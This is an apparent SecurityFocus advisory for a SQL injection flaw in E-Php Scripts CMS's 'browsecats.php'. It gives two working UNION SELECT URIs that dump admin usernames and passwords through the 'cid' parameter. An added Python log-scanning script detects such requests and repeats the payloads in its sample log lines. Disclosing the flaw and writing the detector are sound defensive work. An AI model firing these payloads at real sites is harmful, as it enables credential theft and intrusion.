E-Php Scripts CMS 'browsecats.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/cms/browsecats.php?cid=-12%20union%20select%200,concat(es_username,0x3a,es_password),2,3%20%20from%20esnm_admin

http://target/cms/browsecats.php?cid=-12%20union%20select%200,concat%28es_username,0x3a,es_password%29,2,3%20%20from%20esnm_admin
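For reviewing web server logs for requests of this shape, the following is an added detection example, not part of the original advisory. It assumes Combined Log Format access logs and that a legitimate `cid` is a plain non-negative integer; the sample log lines are constructed from the URIs above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a Combined Log Format line (the log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate category id is a short non-negative integer.
VALID_CID = re.compile(r"[0-9]{1,10}")
# SQL tokens seen in the advisory's example URIs; used only to grade a hit.
SQL_HINT = re.compile(r"\b(?:union|select|concat|from)\b|0x[0-9a-f]+", re.I)

# Constructed sample log lines (addresses are documentation ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2010:10:00:00 +0000] "GET /cms/browsecats.php?cid=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2010:10:00:05 +0000] "GET /cms/browsecats.php?cid=-12%20union%20select%200,concat(es_username,0x3a,es_password),2,3%20%20from%20esnm_admin HTTP/1.1" 200 734',
    '203.0.113.9 - - [01/Jan/2010:10:00:09 +0000] "GET /cms/browsecats.php?cid=-12%20union%20select%200,concat%28es_username,0x3a,es_password%29,2,3%20%20from%20esnm_admin HTTP/1.1" 200 734',
    '198.51.100.7 - - [01/Jan/2010:10:00:12 +0000] "GET /cms/index.php?cid=abc HTTP/1.1" 200 900',
]

def inspect_line(line):
    """Return None for benign lines, else a dict describing the suspicious cid."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/browsecats.php"):
        return None
    # parse_qs percent-decodes, so the %28/%29 variant normalises to the same text.
    values = parse_qs(url.query, keep_blank_values=True).get("cid", [])
    for cid in values:
        if not VALID_CID.fullmatch(cid):
            return {"client": line.split(" ", 1)[0], "cid": cid,
                    "sql_keywords": bool(SQL_HINT.search(cid))}
    return None

def scan(lines):
    """Collect every flagged request from an iterable of log lines."""
    return [hit for hit in map(inspect_line, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```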


 

Copyright 2010, SecurityFocus